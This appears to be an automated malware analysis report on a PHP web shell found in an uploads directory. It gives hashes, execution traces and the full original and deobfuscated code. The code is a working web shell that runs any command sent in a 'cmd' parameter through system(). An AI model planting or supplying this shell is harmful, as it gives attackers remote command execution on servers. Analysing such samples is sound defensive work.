PHP Malware Analysis

rev.php, shell.php

md5: ad6a2727ff7f799b710aff38193fa53a

Jump to: 

Screenshot
Attributes
Execution

Input

Deobfuscated PHP code
<html>
<body>
<form method="GET" name="<?php 
echo basename($_SERVER['PHP_SELF']);
?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php 
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>

Execution traces
data/traces/ad6a2727ff7f799b710aff38193fa53a_trace-1676247581.9559.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:20:07.853764]
1	0	1	0.000173	393512
1	3	0	0.000239	395120	{main}	1		/var/www/html/uploads/rev.php	0	0
2	4	0	0.000261	395120	basename	0		/var/www/html/uploads/rev.php	3	1	'/uploads/rev.php'
2	4	1	0.000282	395184
2	4	R			'rev.php'
1	3	1	0.000303	395120
			0.000333	314224
TRACE END   [2023-02-12 22:20:07.853961]


data/traces/ad6a2727ff7f799b710aff38193fa53a_trace-1676259812.4462.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:43:58.344099]
1	0	1	0.000227	393512
1	3	0	0.000293	395120	{main}	1		/var/www/html/uploads/shell.php	0	0
2	4	0	0.000313	395120	basename	0		/var/www/html/uploads/shell.php	3	1	'/uploads/shell.php'
2	4	1	0.000333	395192
2	4	R			'shell.php'
1	3	1	0.000349	395120
			0.000379	314224
TRACE END   [2023-02-13 01:43:58.344294]


Generated HTML code
<html><head></head><body>
<form method="GET" name="rev.php">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre></pre>

<script>document.getElementById("cmd").focus();</script>

</body></html>
Original PHP code
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>